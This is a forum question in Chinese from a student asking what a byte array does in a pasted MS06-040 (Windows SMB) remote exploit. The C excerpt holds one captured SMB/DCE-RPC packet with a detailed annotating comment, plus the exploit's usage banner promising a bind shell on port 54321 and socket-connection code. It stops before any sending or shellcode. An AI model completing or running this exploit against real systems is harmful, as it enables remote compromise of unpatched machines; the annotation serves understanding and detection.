[Buffer - overflow exploit code][1]
嗨,作爲作業的一部分,我正在對一臺 Windows 2000 服務器進行漏洞利用測試,需要一點幫助。我已經附上了一個 C 文件中的漏洞利用代碼截圖,但我真的不明白這段代碼的作用,想知道是否有人能向我解釋其中硬編碼的字節數組在漏洞利用中究竟做了什麼。到目前爲止,我只知道這段代碼會在端口 54321 上給我一個遠程綁定 shell(bind shell)。緩衝區溢出漏洞利用代碼
/*
 * peer0_14: one hard-coded network message (106 bytes) that the program
 * presumably writes verbatim to the connected socket; the send call is not
 * visible in this excerpt.
 *
 * The peer0_N name matches the "C Arrays" export of a packet-capture tool, so
 * this is most likely one client-side packet of a replayed session rather than
 * hand-written data. NOTE(review): confirm against the rest of the file.
 *
 * Layout as read from the bytes below:
 *   bytes 0-3     00 00 00 66  NetBIOS session message, payload length
 *                              0x66 = 102 (4 + 102 = 106 = array size)
 *   bytes 4-7     ff 'S' 'M' 'B'  SMB1 header magic
 *   byte  8       0x25         SMB_COM_TRANSACTION
 *   ...           "\PIPE\" NUL transaction name, i.e. a named-pipe transaction
 *   last 28 bytes 05 00 00 02 ... DCE/RPC v5.0 request PDU: flags 0x02
 *                              (last fragment), fragment length 0x1c = 28,
 *                              opnum 0x1f = 31
 *
 * Opnum 31 is NetprPathCanonicalize if the pipe was bound to the Server
 * Service (srvsvc) interface. The bind happens in an earlier packet that is
 * not shown here, so treat that as an assumption. It is consistent with the
 * usage banner in main(), which names the issue as MS06-040.
 *
 * The header also carries session identifiers (TID/PID/UID/MID) frozen from
 * the original capture.
 *
 * Defensive relevance: this is the traffic shape that network signatures for
 * MS06-040 key on (an SMB1 named-pipe transaction carrying a DCE/RPC request
 * with opnum 31). Mitigation is the MS06-040 update and not exposing SMB
 * (TCP 139/445) to untrusted networks.
 *
 * NOTE(review): the array is plain `char` but holds values above 0x7f (0xff,
 * 0x84, 0xec, 0xe0). Where `char` is signed these convert to negative values;
 * `unsigned char` is the conventional type for raw wire bytes.
 */
char peer0_14[] = {
0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42,
0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d,
0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c,
0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02,
0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c,
0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00,
0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00,
0x00, 0x00 };
int main(int argc,char **argv)
{
int fd;
int con;
int repbf[20000];
struct sockaddr_in target;
if(argc < 2)
{
printf("Microsoft Windows CanonicalizePathName() Remote Exploit (MS06-040)\n");
printf("Tested on WindowsXP SP1 EN and got a bindshell on port 54321\n");
printf("Win2k should give a crash in services.exe\n");
printf("I've used the default smbdomain: WORKGROUP\n\n");
printf("Usage: %s <ip>\n",argv[0]);
printf("Example: %s 192.168.1.103\n\n",argv[0]);
printf("Written by: Preddy\n");
printf("RootShell Security Group\n");
printf("www.team-rootshell.com\n");
exit(1);
}
fd = socket(AF_INET,SOCK_STREAM,0);
if(fd < 0)
{
perror("Could not create socket\n");
exit(1);
}
printf("Target: %s\n",argv[1]);
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(argv[1]);
target.sin_port = htons(PORT);
con = connect(fd,(struct sockaddr_in *)&target,sizeof(target));
if(con < 0)
{
printf("Could not connect\n");
exit(1);
}
以上就是漏洞利用代碼,謝謝。